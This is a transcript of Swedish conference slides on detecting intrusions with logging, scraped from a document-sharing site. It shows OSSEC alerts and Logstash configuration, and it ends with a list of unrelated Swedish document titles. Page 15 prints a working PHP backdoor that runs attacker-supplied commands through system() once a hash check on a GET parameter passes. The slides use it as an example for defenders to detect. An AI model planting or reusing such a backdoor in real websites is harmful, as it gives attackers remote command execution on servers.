Upload File

upptäcka intrång med hjälp av loggning

17
Intrång upptäckt av loggning CoreSec 2016-05-19

Upload: jonas-lejon

Post on 21-Jan-2018

161 views

Category:

Internet


4 download

Report

TRANSCRIPT

Page 1: Upptäcka intrång med hjälp av loggning

Intrång upptäckt av loggning

CoreSec 2016-05-19

Page 2: Upptäcka intrång med hjälp av loggning

Jonas Lejon

triop.sekryptera.se

[email protected]@jonasl

Page 3: Upptäcka intrång med hjälp av loggning
Page 4: Upptäcka intrång med hjälp av loggning

OSSEC HIDS Notification.2013 Jun 16 23:48:29Received From: hetzner->/var/www/logs/error.logRule: 31421 fired (level 5) -> "PHP internal error (missing file or function).”

Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGIsent in stderr: "PHP message: PHP Fatal error: Call to undefined functioninclud_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"

Page 5: Upptäcka intrång med hjälp av loggning

OSSEC HIDS Notification.2013 Jun 16 23:48:29Received From: hetzner->/var/www/logs/error.logRule: 31421 fired (level 5) -> "PHP internal error (missing file or function).”

Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGIsent in stderr: "PHP message: PHP Fatal error: Call to undefined functioninclud_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"

Page 6: Upptäcka intrång med hjälp av loggning
Page 7: Upptäcka intrång med hjälp av loggning

+

Page 8: Upptäcka intrång med hjälp av loggning

output { if [type] == "syslog" { file {message_format => "%{[message]}"

path => "/ebs/syslog/logstash/%{[host]}.syslog" }

}}

Page 9: Upptäcka intrång med hjälp av loggning

find /ebs/syslog/logstash/ -type f -exec ./util.sh addfile {} syslog \;

Page 10: Upptäcka intrång med hjälp av loggning
Page 11: Upptäcka intrång med hjälp av loggning
Page 12: Upptäcka intrång med hjälp av loggning
Page 13: Upptäcka intrång med hjälp av loggning

• IP-adress• Metadata

Page 14: Upptäcka intrång med hjälp av loggning
Page 15: Upptäcka intrång med hjälp av loggning

https://gist.github.com/jonaslejon

<?php

if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);@system($time); exit;

}

?>

Exempel på bakdörr

Page 16: Upptäcka intrång med hjälp av loggning

Filintegritet

OSSEC HIDS Notification.2015 Jul 16 00:41:30

Received From: ds5090->syscheckRule: 554 fired (level 7) -> "File added to the /var/www directory."Portion of the log(s):

New file '/var/www/website.com/docs/president.php' added to the file system.

--END OF NOTIFICATION

http://bitcoints.com/docs/mturk/president.php
Page 17: Upptäcka intrång med hjälp av loggning

Tack!


File Maker Pro Hjälp August 2009

Målet är att: upptäcka, stödja och frammana salutogena ... · Salutogent samtal Målet är att: • upptäcka, • stödja och • frammana salutogena resurser

HJÄLP VID – GOLV

Var får jag hjälp?

ÖRBUN D Y DE T DYS D E T Karlstad 19-20 oktober 2018 ... · Sal 2 • 10.00-11.00 - Prova på att upptäcka och se ditt läsmönster med hjälp av en ögonkamera. Arrangör: Begriplig

Trafiksäkerhetsrevision – en hjälp till självhjälp

Främja, förebygga, upptäcka och åtgärda...Främja, förebygga, upptäcka och åtgärda Hur skolan kan arbeta mot diskriminering och kränkande behandling Främja, förebygga,

Upphovsrättsligt intrång genom webbskrapning

Att upptäcka sin hembygd

Depression hos män att upptäcka och stödjadepression har ofta dolda symtom därför är det svårt att upptäcka manlig depression ute i samhället. Syftet med denna litteraturstudie

Ökad friktion med hjälp av laserytbehandling

Hantering av IT-incidenter i vårdmiljö120032/FULLTEXT01.pdf · interna eller externa intrång och intrångsförsök, felaktig användning av informationssystemen ... gjorda med

UPPTÄCKA MISSBRUK Lennart Karlsson · 2017. 12. 12. · Denna lagstiftning syftar främst till att upptäcka narkoti-kapåverkade i trafiken. Det senaste tillskottet i lagstiftningen

RESTAURANTE TIENDA SUECA te damos Menú Infantil -20 …€¦ · 1. UPPTÄCKA bolsa de viaje con ruedas 39,95 101.325.14 Precio socios 31,95 2. UPPTÄCKA bolsa de aseo 9,99 801.325.15

Hjälp! Min webbplats är responsiv!

Samplingars intrång i ett upphovsrättsligt musikverk …hj.diva-portal.org/smash/get/diva2:430235/FULLTEXT01.pdf · Samplingars intrång i ett upphovsrättsligt skyddat musikverk

Version 1.2 (april 2013) Hjälp om RIB Karta - msb.se · Hjälp om RIB Karta är den digitala hjälpen i RIB Karta som öppnas genom tangenten F1 eller menyn Hjälp > Hjälp om RIB

Frukostseminarium: Smarta rapporter med hjälp av Google Analytics

Analys av loggar vid intrång i Windows NT · Detta examensarbete behandlar loggning i samband med intrång i Windows NT (NT). I bör-jan av projektet gjorde någon utomstående ett

Vilket är bästa sättet att förebygga, upptäcka, lokalisera ... · Vilket är bästa sättet att förebygga, upptäcka, lokalisera och åtgärda fel i nätet lDimensionera systemet

Att upptäcka Mellanstaden833637/FULLTEXT01.pdf · Att upptäcka Mellanstaden En studie av stadens ytterområden med Kristianstad som exempel Margareta Mark och Marcel Abedini 20020606

upptäcka bekräftade fall av covid-19 Bombshell: CDC känner

Företag startade med hjälp från Nyföretagarcentrum

Matematik – med hjälp av sagor

Synliggör din systemförvaltning med hjälp av ledningsstöd

OMVÅRDNADSDIAGNOSTIK MED HJÄLP AV EN KLASSIFIKATION … · omvÅrdnadsdiagnostik med hjÄlp av en klassifikation fÖr omvÅrdnad catrin bjÖrvell leg sjukskÖt, med dr karolinska

Skördeprognos med hjälp av YARA N-sensor

Fosterdiagnostik Etisk analys för diagnostik med foster …€¦ · Den medicinska målsättningen med fosterdiagnostik är att upptäcka en sjukdom ... för att upptäcka sjukdomar

Utrymning med hjälp av brandhissar - Lu

Hjälp i hemmet¤lp_i_hemmet1_2012_6.3.pdf · 2 | Hjälp i hemmet |Tjänstepaletten för hemvården i Helsingfors Tjänstepaletten inom hemvården i Helsingfors Bilaga Hemvårdens

Inkludering med hjälp av digitala verktyg

385 000 barn att upptäcka och stödja!1469892/FULLTEXT01.pdf · 2020. 9. 22. · 1 385 000 barn att upptäcka och stödja! En kvalitativ och kvantitativ utvärdering av materialet

”Hjälp det brinner” - DiVA portal539838/FULLTEXT01.pdf · 2012. 7. 5. · 1 ABSTRAKT SPECIALPEDAGOGPROGRAMMET Titel ”Hjälp det brinner” Hur förskollärare och grundskollärare

Dimensionering av grundläggning med hjälp av Eurokod

Personlig branding med hjälp av sociala medier